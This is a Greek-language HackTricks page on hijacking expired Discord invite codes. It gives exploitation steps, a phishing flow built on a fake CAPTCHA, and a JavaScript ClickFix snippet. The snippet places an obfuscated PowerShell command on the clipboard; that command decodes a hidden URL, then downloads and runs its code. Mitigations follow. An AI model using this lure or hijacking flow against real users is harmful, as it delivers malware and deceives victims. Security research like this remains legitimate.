Discord Invite Hijacking
Reading time: 4 minutes
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Η ευπάθεια του συστήματος προσκλήσεων του Discord επιτρέπει στους απειλητικούς παράγοντες να διεκδικήσουν κωδικούς προσκλήσεων που έχουν λήξει ή διαγραφεί (προσωρινοί, μόνιμοι ή προσαρμοσμένοι) ως νέους προσαρμοσμένους συνδέσμους σε οποιονδήποτε διακομιστή με Boost επιπέδου 3. Με την κανονικοποίηση όλων των κωδικών σε πεζά, οι επιτιθέμενοι μπορούν να προεγγραφούν σε γνωστούς κωδικούς προσκλήσεων και να υποκλέψουν σιωπηλά την κίνηση μόλις ο αρχικός σύνδεσμος λήξει ή ο πηγαίος διακομιστής χάσει το Boost του.
Τύποι Προσκλήσεων και Κίνδυνος Υποκλοπής
Τύπος Πρόσκλησης | Υποκλέψιμος; | Συνθήκη / Σχόλια |
---|---|---|
Προσωρινός Σύνδεσμος Πρόσκλησης | ✅ | Μετά την λήξη, ο κωδικός γίνεται διαθέσιμος και μπορεί να ξαναεγγραφεί ως προσαρμοσμένο URL από έναν διακομιστή με Boost. |
Μόνιμος Σύνδεσμος Πρόσκλησης | ⚠️ | Εάν διαγραφεί και αποτελείται μόνο από πεζά γράμματα και ψηφία, ο κωδικός μπορεί να γίνει διαθέσιμος ξανά. |
Προσαρμοσμένος Σύνδεσμος | ✅ | Εάν ο αρχικός διακομιστής χάσει το Boost επιπέδου 3, η προσαρμοσμένη πρόσκληση γίνεται διαθέσιμη για νέα εγγραφή. |
Βήματα Εκμετάλλευσης
- Αναγνώριση
- Παρακολουθήστε δημόσιες πηγές (φόρουμ, κοινωνικά δίκτυα, κανάλια Telegram) για προσκλήσεις που ταιριάζουν με το μοτίβο
discord.gg/{code}
ήdiscord.com/invite/{code}
. - Συλλέξτε κωδικούς προσκλήσεων που σας ενδιαφέρουν (προσωρινούς ή προσαρμοσμένους).
- Προεγγραφή
- Δημιουργήστε ή χρησιμοποιήστε έναν υπάρχοντα διακομιστή Discord με προνόμια Boost επιπέδου 3.
- Στις Ρυθμίσεις Διακομιστή → Προσαρμοσμένο URL, προσπαθήστε να αναθέσετε τον στοχοθετημένο κωδικό πρόσκλησης. Εάν γίνει αποδεκτός, ο κωδικός διατηρείται από τον κακόβουλο διακομιστή.
- Ενεργοποίηση Υποκλοπής
- Για προσωρινές προσκλήσεις, περιμένετε μέχρι να λήξει η αρχική πρόσκληση (ή διαγράψτε την χειροκίνητα αν ελέγχετε την πηγή).
- Για κωδικούς που περιέχουν κεφαλαία, η πεζή παραλλαγή μπορεί να διεκδικηθεί αμέσως, αν και η ανακατεύθυνση ενεργοποιείται μόνο μετά την λήξη.
- Σιωπηλή Ανακατεύθυνση
- Οι χρήστες που επισκέπτονται τον παλιό σύνδεσμο αποστέλλονται ομαλά στον διακομιστή που ελέγχεται από τον επιτιθέμενο μόλις η υποκλοπή είναι ενεργή.
Ροή Phishing μέσω Διακομιστή Discord
- Περιορίστε τα κανάλια του διακομιστή ώστε να είναι ορατό μόνο το κανάλι #verify.
- Αναπτύξτε ένα bot (π.χ., Safeguard#0786) για να προτρέπει τους νέους χρήστες να επαληθεύσουν μέσω OAuth2.
- Το bot ανακατευθύνει τους χρήστες σε μια ιστοσελίδα phishing (π.χ.,
captchaguard.me
) υπό την προφύλαξη ενός CAPTCHA ή βήματος επαλήθευσης. - Εφαρμόστε το κόλπο UX ClickFix:
- Εμφανίστε ένα μήνυμα σπασμένου CAPTCHA.
- Οδηγήστε τους χρήστες να ανοίξουν το διάλογο Win+R, να επικολλήσουν μια προφορτωμένη εντολή PowerShell και να πατήσουν Enter.
Παράδειγμα Εισαγωγής Clipboard ClickFix
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);
Αυτή η προσέγγιση αποφεύγει τις άμεσες λήψεις αρχείων και εκμεταλλεύεται οικεία στοιχεία διεπαφής χρήστη για να μειώσει την υποψία των χρηστών.
Mitigations
- Χρησιμοποιήστε μόνιμους συνδέσμους πρόσκλησης που περιέχουν τουλάχιστον ένα κεφαλαίο γράμμα ή μη αλφαριθμητικό χαρακτήρα (ποτέ δεν λήγουν, μη επαναχρησιμοποιήσιμοι).
- Περιστασιακά αλλάξτε τους κωδικούς πρόσκλησης και ανακαλέστε τους παλιούς συνδέσμους.
- Παρακολουθήστε την κατάσταση ενίσχυσης του διακομιστή Discord και τις αξιώσεις για vanity URL.
- Εκπαιδεύστε τους χρήστες να επαληθεύουν την αυθεντικότητα του διακομιστή και να αποφεύγουν την εκτέλεση εντολών που έχουν επικολληθεί από το πρόχειρο.
References
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.